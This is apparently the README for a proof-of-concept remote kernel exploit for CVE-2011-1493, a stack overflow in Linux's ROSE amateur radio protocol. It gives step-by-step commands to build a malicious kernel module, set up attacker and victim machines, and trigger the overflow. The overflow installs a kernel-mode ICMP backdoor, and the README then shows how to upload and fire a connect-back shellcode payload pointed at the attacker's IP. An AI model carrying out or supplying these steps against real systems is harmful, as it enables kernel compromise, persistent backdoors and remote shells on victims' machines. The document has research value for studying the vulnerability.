********************************
* ROSE remote kernel exploit   *
* by Dan Rosenberg (@djrbliss) *
********************************

This is an exploit for CVE-2011-1493, a remote stack overflow in the Linux
implementation of the ROSE amateur radio protocol.  THIS IS PROOF OF CONCEPT.
It should work very reliably on the kernel I tested (Ubuntu Server 10.04), but
I make no promises about other kernels.  Obviously, any hard-coded addresses
and offsets (in payload.h) must be adjusted for the targeted kernel.

Before running this, you'll need the ax25-tools package and the kernel headers
for the attacker machine's kernel.

The directory structure and instructions are as follows:

 module/	The actual exploit, included as a modification to the original
		ROSE kernel module.  This should be built against the
		attack machine's kernel by running:

		$ make -C /lib/modules/$(uname -r)/build SUBDIRS=$PWD modules

		This will work out of the box on some kernels.  If this fails
		to compile against your kernel, download the appropriate ROSE
		kernel module for your kernel and make the following
		modifications:

		1. Add an #include "payload.h" in rose_subr.c.

		2. Copy-paste the rose_create_facilities() function from the
		   included module into the new rose_subr.c.

		3. Copy the .S assembly files, payload.c, and payload.h into
		   the new directory.

		4. Copy the Makefile into the new directory.

		At this point, the module should build against your kernel,
		resulting in a rose.ko file.


 conf/		Configuration files necessary for setting up a ROSE stack.
		Extract server-conf.tar.gz to the root directory of the victim
		machine (as root), and extract client-conf.tar.gz to the root
		directory of the attacker machine (as root).


 scripts/	Scripts to configure and enable the ROSE stacks.  Before using
		the client script, edit it and replace the path to the ROSE
		kernel module with the full path of the recently compiled
		exploit module (rose.ko).  When you are ready to run the
		exploit, run ./rose_server.sh as root on the victim machine,
		and ./rose_client.sh as root on the attacker machine.

		Next, to run the exploit and install a kernel-mode ICMP backdoor
		into the victim machine, run the following:

		$ rose_call rose ELITE-1 LOSER-1 6060606060

		This will place a ROSE connection from the attacker to the
		victim.  This connection will hang, so you'll need to ctrl+c
		the rose_call command.


 icmp/		The code for installing and triggering payloads using the ICMP
		backdoor.  First, compile magicping.c:

		$ gcc magicping.c -o magicping

		This tool must be run as root or with CAP_NET_RAW (in order to
		open a raw socket for our ICMP packets).  One sample payload is
		provided: connect.S, a standard connect-back shellcode.  Also
		included is a calibrate.py script, which will allow you to
		easily modify connect.S to point to your IP and port.  The
		payload can be prepared as follows:

		$ as connect.S -o connect.out
		$ objcopy -O binary -j .text connect.out connect.o

		The payload can then be installed on the remote kernel as
		follows:

		$ ./magicping -i connect.o [remote ip]

		This payload can be triggered by hooking a system call of
		choice as follows:

		$ ./magicping -t [syscall number] [remote ip]